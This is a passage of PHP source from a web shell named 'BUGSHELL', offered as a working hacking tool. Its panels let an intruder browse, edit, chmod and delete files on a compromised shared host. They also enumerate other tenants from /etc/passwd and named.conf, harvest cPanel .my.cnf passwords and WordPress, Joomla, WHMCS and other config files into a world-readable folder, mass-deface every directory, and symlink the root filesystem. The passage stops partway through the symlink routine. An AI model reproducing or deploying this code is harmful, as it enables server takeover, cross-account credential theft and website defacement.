861.         -webkit-border-radius: 5px;
862.         -moz-border-radius: 5px;
863.         -ms-border-radius: 5px;
864.         -o-border-radius: 5px;
865.         border-radius: 5px;
866.         -webkit-box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.2);
867.         box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.2);
868.    }
869. option {
870.    -webkit-transition: all 0.5s;
871.    -moz-transition: all 0.5s;
872.     transition: all 0.5s;
873. }
874. .move-top {
875.    position: fixed;
876.    bottom: 10px;
877.    right: 10px;
878.    text-decoration: none;
879.    padding: 10px;
880.    display: none;
881.    cursor:pointer;
882.    background:rgba(0, 0, 0, 0.2);
883.    border-radius:5px;
884. } </style>
885. <link rel="icon" href="/image/favicon.ico" type="image/x-icon" />
886. <script>
887.    baseUrl = window.location.href.split("?")[0];
888.    window.history.pushState("name", "?", baseUrl);
889.    function c(x) {
890.         window.location = x
891.   }
892. </script>
893.     <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
894.     <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.js"></script>
895.     <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script>
896.    <script src="'.x4.'alert.js"></script>
897. <style>
898. .move-top {
899.    position: fixed;
900.    bottom: 10px;
901.    right: 10px;
902.    text-decoration: none;
903.    padding: 10px;
904.    display: none;
905.    cursor:pointer;
906.    background:rgba(0, 0, 0, 0.2);
907.    border-radius:5px;
908. }</style>
909. <i class="fa fa-chevron-up move-top"></i>
910. <script>
911. jQuery(document).ready(function() {
912.    var offset = 220;
913.    var duration = 500;
914.    jQuery(window).scroll(function() {
915.        if (jQuery(this).scrollTop() > offset) {
916.            jQuery(\'.move-top\').fadeIn(duration);
917.        } else {
918.            jQuery(\'.move-top\').fadeOut(duration);
919.        }
920.    });
921.    jQuery(\'.move-top\').click(function(event) {
922.        event.preventDefault();
923.        jQuery(\'html, body\').animate({scrollTop: 0}, duration);
924.        return false;
925.    })
926. });
927. </script>
928. <script>hljs.initHighlightingOnLoad();</script></head><div class="kepala"><div class="co-ontainer">
929. <table><td style="width:25px">
930. <b><i class="fa fa-bug"></i></b></td><td>BUGSHELL</td><td style="text-align:right;width:100px">
931. <button class="nav" onclick=\'c("'.$_SERVER['PHP_SELF'].'")\'><i class="fa fa-home"></i></button>
932. <button class="nav" onclick=\'c("?'.x5.getcwd().'&'.x7.'about")\'><i class="fa fa-question"></i></button>
933. <button class="nav" onclick=\'c("?'.x5.getcwd().'&'.x7.'logout")\'><i class="fa fa-power-off"></i></button></td></table></div></div>
934.  
935. <div class="co-ontainer-2">
936. <div class="cover"></div>            
937. <div class="dir">
938. <table style="width:100%">
939. <td style="width:100%"><div class="dir-pallet"><table><td class="dir-td-left"><font color="#1D9D73">ROOT</font> :</td><td class="dir-td-right break">');
940. foreach($scdir as $c_dir => $cdir) {   
941.     echo "<a class='a' onclick=\"c('?dir=";
942.     for($i = 0; $i <= $c_dir; $i++) {
943.         echo $scdir[$i];
944.         if($i != $c_dir) {
945.         echo "/";
946.         }
947.     }
948.     echo "')\">$cdir</a>/";
949. }
950. vars('</td></table></div></th></table></div>');
951. $filez = basename($_COEG['file']);
952. $size = filesize("$dir/$filez")/1024;
953.             $size = round($size,3);
954.             if($size > 1024) {
955.                 $size = round($size/1024,2). ' MB';
956.             } else {
957.                 $size = $size. ' KB';
958. }
959. vars('<div class="coL">');
960. if($_COEG['command'] == 'logout') {
961. r($_SERVER['PHP_SELF']);
962. setcookie('BUGSHELL', time() - 3600);
963. }  
964.  
965. // --- View Source --- //
966. elseif($_COEG['command'] == 'view') {
967. echo '<div class="coL-panel"><table>
968. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">SOURCE VIEWER</td></table></div>';
969. echo '<div class="coL-option">';
970. echo '<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
971. <hr>';
972. echo "<table><th><button class='coL-btn-option-active'><i class='fa fa-eye'></i></button></th>
973. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
974. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
975. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
976. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
977. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
978. if(empty($source)) {
979.     error('Source Not Found !!');
980.     echo x9;
981. } else {
982.     echo "<pre class='top'><code class='php'>".$source."</code></pre>";
983.     }
984. }
985.  
986. // --- Edit Source --- //
987. elseif($_COEG['command'] == 'edit') {
988.     if($_COEG['save']) {
989.         $save = file_put_contents($_COEG['file'], $_COEG['src']);
990.     if($save) {
991.     success('Source Saved !!');
992.         } else {
993.     error('Permission Denied !!');
994.     }
995. }
996. echo '<div class="coL-panel"><table>
997. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">EDIT FILE</td></table></div>';
998. echo '<div class="coL-option">
999. <table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
1000. <hr><table>';
1001. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
1002. <th><button class='coL-btn-option-active'><i class='fa fa-pencil'></i></button></th>
1003. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
1004. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
1005. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
1006. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
1007. if(empty($source)) {
1008.     echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."'  style='margin:0px'>
1009.     <textarea name='src' placeholder='# Put your code here...' class='top'></textarea><br>
1010. <input type='submit' class='btn-exe' value='Save' name='save' style='margin-top:3px;width: 100%'></form>";
1011. } else { echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
1012.     <textarea name='src' class='top'>".$source."</textarea>
1013. <input type='submit' value='Save' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form>";
1014.   }
1015. }
1016.  
1017. // --- Rename File --- //
1018. elseif($_COEG['command'] == 'rename') {
1019.         if($_COEG['rename']) {
1020.         $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
1021.         if($rename) {
1022. success('File Renamed !!');
1023. mtr("?".x7."rename&".x5.$dir."&".x6.$dir."/".$_COEG["rename"]);
1024.    } else {
1025. error('Permission Denied !!');
1026.         }
1027. }
1028. echo '<div class="coL-panel"><table>
1029. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">RENAME FILE</td></table></div>';
1030. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
1031. <hr><table>';
1032. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
1033. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
1034. <th><button class='coL-btn-option-active'><i class='fa fa-edit'></i></button></th>
1035. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
1036. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
1037. echo "<div class='coL-option top'>
1038. <br><br><br>
1039.     <center>
1040.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
1041. echo "<form action='?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
1042. <table cellspacing='0'>
1043.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'><input type='text' value='".basename($_COEG['file'])."' name='rename'></td><td style='width:20%'>
1044.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
1045.     </form></div>";
1046. }
1047.  
1048. // --- Chmod File --- //
1049. else if($_COEG['command'] == 'chmod') {
1050. if(isset($_COEG['perm'])) {
1051. if(chmod($_COEG['file'],octdec($_COEG['perm']))) {
1052. success('Chmod Ok !!');
1053. mtr("?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']);
1054. } else {
1055. error('Permission Denied !!');
1056.     }
1057. }
1058. echo '<div class="coL-panel"><table>
1059. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">CHMOD FILE</td></table></div>';
1060. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
1061. <hr><table>';
1062. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
1063. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
1064. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
1065. <th><button class='coL-btn-option-active'><i class='fa fa-cogs'></i></button></th>
1066. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
1067. echo "<div class='coL-option top'>
1068. <br><br><br>
1069.     <center>
1070.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
1071. echo "<form action='?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
1072. <table cellspacing='0'>
1073.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'>
1074. <input type='text' value='".substr(sprintf("%o", fileperms($_COEG['file'])), -4)."' name='perm' style='width:100%'>
1075. <input type='hidden' name='path' value='".$_COEG['file']."'></td><td style='width:20%'>
1076.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
1077.     </form></div>";
1078. }
1079.  
1080. // --- Delete File --- //
1081. elseif($_COEG['command'] == 'delete') {
1082. $delete = unlink($_COEG['file']);
1083. if($delete) {
1084.         vars('<script>c("?'.x5.$dir.'");</script>');
1085.     } else {
1086.         error('Permission Denied !!');
1087.     }
1088. }
1089.  
1090. // --- Jumping Server --- //
1091. elseif($_COEG['command'] == 'jumping') {
1092. echo '<div class="coL-panel"><table>
1093. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">JUMPING SERVER</td></table></div>';
1094. $i = 0;
1095. $s_a = fopen("/etc/passwd", "r");
1096. while($s_b = fgets($s_a)) {
1097.     if($s_b == '' || !$s_a) {
1098.          error("Can't Read [ /etc/passwd ]");
1099.                  mtr("?".x5.$dir);
1100.                  echo x9;
1101.     } else {
1102.         preg_match_all('/(.*?):x:/', $s_b, $s_c);
1103.         foreach($s_c[1] as $s_d) {
1104.             $s_e = "/home/$s_d/public_html";
1105.             if(is_readable($s_e)) {
1106.                 $i++;
1107.                 $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-file'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'> <a href='?dir=$s_e'>[ $s_d ]</a></td>";
1108.                 if(is_writable($s_e)) {
1109.                     $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-info'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'>
1110.                      <a href='?dir=$s_e'><font color='red'>[ $s_d ]</font></a></td>";
1111.                 }
1112.                 echo $s_o;
1113.                 $s_k = file_get_contents("/etc/named.conf");   
1114.                 if($s_k == '') {
1115.                      success('Server Not Found !!');
1116.                      mtr("?".x5.$dir);
1117.                       echo x9;
1118.                 } else {
1119.                     preg_match_all("#/var/named/(.*?).db#", $s_k, $s_v);
1120.                     foreach($s_v[1] as $s_x) {
1121.                         $s_g = posix_getpwuid(@fileowner("/etc/valiases/$s_x"));
1122.                         $s_g = $s_g['name'];
1123.                         if($s_g == $s_d) {
1124.                             echo "<td class='td-info'><a href='http://$s_x'>http://$s_x</a> </td></table>"; break;}}}}}}}
1125. if($i == 0) {
1126.          error('Server Not Found !!');
1127.          mtr("?".x5.$dir);
1128.          echo x9;
1129. } else {
1130.     echo "<div class='coL-option top'>Total : <span class='label label-default'> ".$i." <span></div>";
1131.     }
1132. }
1133.  
1134. // --- Config Grabber --- //
1135. elseif($_COEG['command'] == 'config') {
1136.     $s_t = fopen("/etc/passwd", "r");
1137.     $s_z = mkdir("bug-config", 0777);
1138.     $s_s = "Options all\
1139. Require None\
1140. Satisfy Any";
1141.     $s_d = fopen("bug-config/.htaccess","w");
1142.     fwrite($s_d, $s_s);
1143.     while($s_q = fgets($s_t)) {
1144.         if($s_q == "" || !$s_t) {
1145.     error('Can\'t Read etc/passwd !!');
1146.         } else {
1147.             preg_match_all('/(.*?):x:/', $s_q, $s_y);
1148.             foreach($s_y[1] as $s_p) {
1149.                 $s_k = "/home/$s_p/public_html/";
1150.                 if(is_readable($s_k)) {
1151.                     $s_g = array(
1152.                         "/home/$s_p/.my.cnf" => "cpanel",
1153.                         "/home/$s_p/.accesshash" => "WHM-accesshash",
1154.                         "/home/$s_p/public_html/bw-configs/config.ini" => "BosWeb",
1155.                         "/home/$s_p/public_html/config/koneksi.php" => "Lokomedia",
1156.                         "/home/$s_p/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1157.                         "/home/$s_p/public_html/clientarea/configuration.php" => "WHMCS",
1158.                         "/home/$s_p/public_html/whm/configuration.php" => "WHMCS",
1159.                         "/home/$s_p/public_html/whmcs/configuration.php" => "WHMCS",
1160.                         "/home/$s_p/public_html/forum/config.php" => "phpBB",
1161.                         "/home/$s_p/public_html/sites/default/settings.php" => "Drupal",
1162.                         "/home/$s_p/public_html/config/settings.inc.php" => "PrestaShop",
1163.                         "/home/$s_p/public_html/app/etc/local.xml" => "Magento",
1164.                         "/home/$s_p/public_html/joomla/configuration.php" => "Joomla",
1165.                         "/home/$s_p/public_html/configuration.php" => "Joomla",
1166.                         "/home/$s_p/public_html/wp/wp-config.php" => "WordPress",
1167.                         "/home/$s_p/public_html/wordpress/wp-config.php" => "WordPress",
1168.                         "/home/$s_p/public_html/wp-config.php" => "WordPress",
1169.                         "/home/$s_p/public_html/admin/config.php" => "OpenCart",
1170.                         "/home/$s_p/public_html/slconfig.php" => "Sitelok",
1171.                         "/home/$s_p/public_html/application/config/database.php" => "Ellislab");
1172.                     foreach($s_g as $s_h => $s_l) {
1173.                         $s_r = file_get_contents($s_h);
1174.                         if($s_r == '') {
1175.                         } else {
1176.                             $fcS = fopen("bug-config/$s_p-$s_l.txt","w");
1177.                             fputs($fcS,$s_r);
1178.                         }}}}}}
1179. success('OK !!');
1180. vars("<script>c('?".x5.$dir."/bug-config');</script>");
1181. }
1182.  
1183.  
1184. // --- Cookies Manager --- //
1185. elseif($_COEG['command'] == 'cookie') {
1186. vars('<div class="coL-panel"><table>
1187. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">COOKIES MANAGER</td></table></div>');
1188. vars("<table class='table-info' cellspacing='0'>");
1189. vars("<th class='th-info cookie-td'><center>Name</center></th><th class='th-info' style='width:30px'><center><i class='fa fa-angle-right'></i></th><th class='th-info'><center>Value</center></th><tr class='ex-hov'>");
1190. if(count($_COOKIE) != 0) {
1191. foreach($_COOKIE as $c1 => $c2) {
1192. echo "<td class='td-info break'>".$c1."</td><td class='td-info' style='width:30px'><center><i class='fa fa-angle-right'></i></td><td class='td-info break'>".$c2."</td><tr class='ex-hov'>";
1193. }
1194. vars("</table>");
1195. }
1196. vars('<div class="coL-option" style="padding:7px">');
1197. vars("<table><td style='text-align:center;width:20px'><span class='label label-default'><i class='fa fa-angle-right'></i></span></td><td> Cookies Found : [ <font color='1D9D73'> ".count($_COOKIE)."</font> ]</td></table></div>");
1198. if(isset($_POST['c3'])) {
1199. if(setcookie($_POST['c3'],$_POST['c2'])) {
1200.     success('Cookie Created !!');
1201.     mtr('?'.x7.'cookie&'.x5.$dir);
1202. } else {
1203.     error('Permission Denied !!');
1204.     }
1205. }
1206. echo '<form style="margin:0px" action="?'.x7.'cookie&'.x5.$dir.'" method="POST">
1207. <table cellspacing="0" class="top">
1208. <td><input type="text" placeholder="Name" name="c3"></td>
1209. <td><input type="text" placeholder="Value" name="c2"></td>
1210. <td style="width:50px"><button class="btn-exe" type="submit"><i class="fa fa-arrow-circle-right"></i></button></td></table></form>';
1211. }
1212.  
1213. // --- cpanel finder  --- //
1214. elseif($_COEG['command'] == 'cpanel') {
1215. echo '<div class="coL-panel"><table>
1216. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CPANEL FINDER</td></table></div>';
1217. @ini_set('display_errors',0);
1218. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1219.     $ar0=explode($marqueurDebutLien, $text);
1220.     $ar1=explode($marqueurFinLien, $ar0[$i]);
1221.     return trim($ar1[0]);
1222. }
1223. $d0mains = @file('/etc/named.conf');
1224. $domains = scandir("/var/named");
1225. if ($domains or $d0mains) {
1226.     $domains = scandir("/var/named");
1227.     if($domains) {
1228. echo "<table class='table-info' style='width:100%'><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center></th></tr>";
1229. $count=1;
1230. $dc = 0;
1231. $list = scandir("/var/named");
1232. foreach($list as $domain){
1233. if(strpos($domain,".db")){
1234. $domain = str_replace('.db','',$domain);
1235. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1236. $dirz = '/home/'.$owner['name'].'/.my.cnf';
1237. $path = getcwd();
1238. if (is_readable($dirz)) {
1239. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1240. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
1241. $password=entre2v2($p,'password="','"');
1242. echo "<tr>
1243. <td class='td-info' style='width:150px'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td>
1244. <td class='td-info'><a class='a' href='".$owner['name'].".txt' target='_blank'>OPEN</a></td></tr>";
1245. $dc++; }}}
1246. echo '</table>';
1247. $total = $dc;
1248. echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
1249. }else{
1250. $d0mains = @file('/etc/named.conf');
1251.     if($d0mains) {
1252. echo "<table class='table-info' style='width:100%'><tr><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center> </th></tr>";
1253. $count=1;
1254. $dc = 0;
1255. $mck = array();
1256. foreach($d0mains as $d0main){
1257.     if(@eregi('zone',$d0main)){
1258.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
1259.         flush();
1260.         if(strlen(trim($domain[1][0])) >2){
1261.             $mck[] = $domain[1][0];
1262.         } } }
1263. $mck = array_unique($mck);
1264. $usr = array();
1265. $dmn = array();
1266. foreach($mck as $o) {
1267.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1268.     $usr[] = $infos['name'];
1269.     $dmn[] = $o;
1270. }
1271. array_multisort($usr,$dmn);
1272. $dt = file('/etc/passwd');
1273. $passwd = array();
1274. foreach($dt as $d) {
1275.     $r = explode(':',$d);
1276.     if(strpos($r[5],'home')) {
1277.         $passwd[$r[0]] = $r[5];
1278.     }
1279. }
1280. $l=0;
1281. $j=1;
1282. foreach($usr as $r) {
1283. $dirz = '/home/'.$r.'/.my.cnf';
1284. $path = getcwd();
1285. if (is_readable($dirz)) {
1286. copy($dirz, $path.'/'.$r.'.txt');
1287. $p=file_get_contents($path.'/'.$r.'.txt');
1288. $password=entre2v2($p,'password="','"');
1289. echo "<tr>
1290. <td class='td-info'><a target='_blank' href=http://".$dmn[$j-1]."/>".$dmn[$j-1]." </a></td>
1291. <td class='td-info'><a href='".$r.".txt'>OPEN</a> </center></td></tr>";
1292. $dc++;
1293.                 flush();
1294.                 $l=$l?0:1;
1295.                 $j++;
1296.         }
1297.     }
1298. }
1299. echo '</table>';
1300. $total = $dc;
1301. echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
1302.     }
1303. } else{
1304.     error('Access Disabled !!');
1305.     mtr('?'.x5.$dir);
1306.     echo x9;
1307.     }
1308. }
1309.  
1310. // --- Mass Deface --- //
1311. elseif($_COEG['command'] == 'massdef') {
1312. echo '<div class="coL-panel"><table>
1313. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">MASS DEFACE</td></table></div>';
1314. echo '<div class="coL-option">';
1315. echo "<form action='?".x7."massdef&".x5.$dir."' method='post'>";
1316. echo "<table cellspacing='0'>
1317. <td align='left' style='padding:7px;width:60px'>
1318. Root :</td><td><input type='text' name='base_dir' style='width:100%' value='".getcwd()."'></td></tr>";
1319. echo "<tr><td align='left' style='padding:7px;width:60px'>File :</td><td> <input type='text' name='file_name' value='index.php' style='width:100%' placeholder=''></td></tr></table>";
1320. echo "<br>Source :<br><br>
1321. <textarea name='index'># Hacked By Wildan Izzudin !!</textarea>";
1322. echo "<input type='submit' value='CROT' class='btn-exe' style='width:100%;margin-top:3px'></form></center></div>";
1323. if (isset ($_COEG['base_dir']))
1324. {
1325.         if (!file_exists ($_COEG['base_dir'])) {
1326.  $alert = "Destination Not Found !";
1327.  failed1($alert); }
1328.         @chdir ($_COEG['base_dir']) or die ("<script>alert('Cannot Open Directory');</script>");
1329.  
1330.         $files = @scandir ($_COEG['base_dir']) or die ("Oh Shit !!<br>");
1331.         foreach ($files as $file):
1332.                 if ($file != "." && $file != ".." && @filetype ($file) == "dir")
1333.                 {
1334.                         $index = getcwd ()."/".$file."/".$_COEG['file_name'];
1335.                         if (file_put_contents ($index, $_COEG['index']))
1336.                                 echo "
1337.                <div class='coL-option break wrap' style='margin-top:2px;margin-bottom:2px'><span class='label-default'>+</span>  $index </span></div>"; }
1338.         endforeach;
1339.     }
1340. }
1341.  
1342. // --- Multi Hash --- //
1343. elseif($_COEG['command'] == 'multihash') {
1344. vars('<div class="coL-panel"><table>
1345. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">MULTI HASH</td></table></div>');
1346. if($_COEG['encrypt']) {
1347.     switch($_COEG['id']) {
1348.         case '1':
1349. if(md5($_COEG['text'])) {
1350. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
1351. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Md5 :</td><td class='break'> ".md5($_COEG['text'])."</td></table></div>"); } else {
1352.     error('Permission Denied !!');
1353.     }
1354. break;
1355. case '2':
1356. if(crc32($_COEG['text'])) {
1357. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
1358. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Crc32 :</td><td class='break'> ".crc32($_COEG['text'])."</td></table></div>"); } else {
1359.     error('Permission Denied !!');
1360.     }
1361. break;
1362. case '3':
1363. if(sha1($_COEG['text'])) {
1364. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
1365. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Sha1 :</td><td class='break'> ".sha1($_COEG['text'])."</td></table></div>"); } else {
1366.     error('Permission Denied !!');
1367.     }
1368. break;
1369. case '4':
1370. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
1371. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr>
1372. <td class='td-md5'
1373. style='width:70px'><font color='#1D9D73'>+</font> Md5 :</td><td class='break'> ".md5($_COEG['text'])."</td><tr>
1374. <td class='td-md5'
1375. style='width:70px'><font color='#1D9D73'>+</font> Crc32 :</td><td class='break'> ".crc32($_COEG['text'])."</td><tr>
1376. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Sha1 :</td><td class='break'> ".sha1($_COEG['text'])."</td></table></div>");
1377. break;
1378.     }
1379. }
1380. vars("<div class='coL-option top'>
1381.     <form action='?".x7."multihash&".x5.$dir."' method='post'>
1382. <table style='width:100%'>
1383.     <td style='width:20%'>Text :</td><td style='width:80%'>
1384.     <input type='text' name='text' style='width:100%'>
1385. </td><tr>
1386. <td style='width:20%'>Hash :</td><td style='width:80%'><select name='id' style='width:100%'>
1387. <option value='1'>Md5</option>
1388. <option value='2'>Crc32</option>
1389. <option value='3'>Sha1</option>
1390. <option value='4'>All</option>
1391. </select></td><tr><td style='width:20%'></td><td style='width:80%'>
1392.     <input type='submit' value='Create' name='encrypt' class='btn-exe' style='width:100px'></td></table></form></div>");
1393. }
1394.  
1395.  
1396. // --- Multi Symlink --- //
1397. elseif($_COEG['command'] == 'symlink') {
1398. echo '<div class="coL-panel"><table>
1399. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">MULTI SYMLINK</td></table></div>';
1400. if(is_readable("/etc/named.conf")) {
1401.     $named = '<a href="?symlink=named.conf&dir='.$dir.'">OPEN</a>';
1402.     } else {
1403.     $named = '<font color="red">DISABLED</font>';
1404. }
1405. if(is_readable("/etc/valiases")) {
1406.     $valiases = '<a href="?symlink=valiases&dir='.$dir.'">OPEN</a>';
1407.     } else {
1408.     $valiases = '<font color="red">DISABLED</font>';
1409. }
1410. if(is_readable("/etc/passwd")){
1411.     $passwd = '<a href="?symlink=passwd&dir='.$dir.'">OPEN</a>';
1412.     } else {
1413.     $passwd = '<font color="red">DISABLED</font>';
1414.     }
1415. if(is_readable("/var/named")){
1416.     $var = '<a href="?symlink=var&dir='.$dir.'">OPEN</a>';
1417.     } else {
1418.     $var = '<font color="red">DISABLED</font>';
1419.     }  
1420. echo '<table class="table-info">';
1421.     echo '<th class="th-info">From</th>';
1422.     echo '<th class="th-info">Arrow</th>';
1423.     echo '<th class="th-info">Action</th>';
1424.     echo '<tr>';
1425.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/named.conf ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$named.'</a></center></td>';
1426.     echo '<tr>';
1427.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/valiases ]</td><td class="td-info""><center>&raquo;</center></td><td class="td-info"><center>'.$valiases.'</a></center></td>';
1428.     echo '<tr>';
1429.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/passwd ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$passwd.'</a></center></td>';
1430.     echo '<tr>';
1431.     echo '<td class="td-info"><span class="label-default">+</span> [ /var/named/ ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$var.'</a></center></td>';
1432.     echo '</table>';
1433. @mkdir('pee',0777);
1434. @symlink("/","pee/root");
1435. $htaccss = "Options all
1436. DirectoryIndex Sux.html
1437. AddType text/plain .php
1438. AddHandler server-parsed .php
1439. AddType text/plain .html
1440. AddHandler txt .html
1441. Require None
1442. Satisfy Any";
1443. file_put_contents("pee/.htaccess",$htaccss);
1444. $ms_2 = file_get_contents("/etc/passwd");
1445. $ms_2z = explode("\n",$ms_2);
1446.    
1447.     foreach($ms_2z as $ms_3){
1448. $ms_1 = explode(":",$ms_3);
1449. error_reporting(0);
1450.  
1451. $ms_4 = posix_getcwd();
1452. $dr = explode("/",$ms_4);
1453.  
1454. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp-config.php',"pee/".$ms_1[0].'-WordPress.txt');
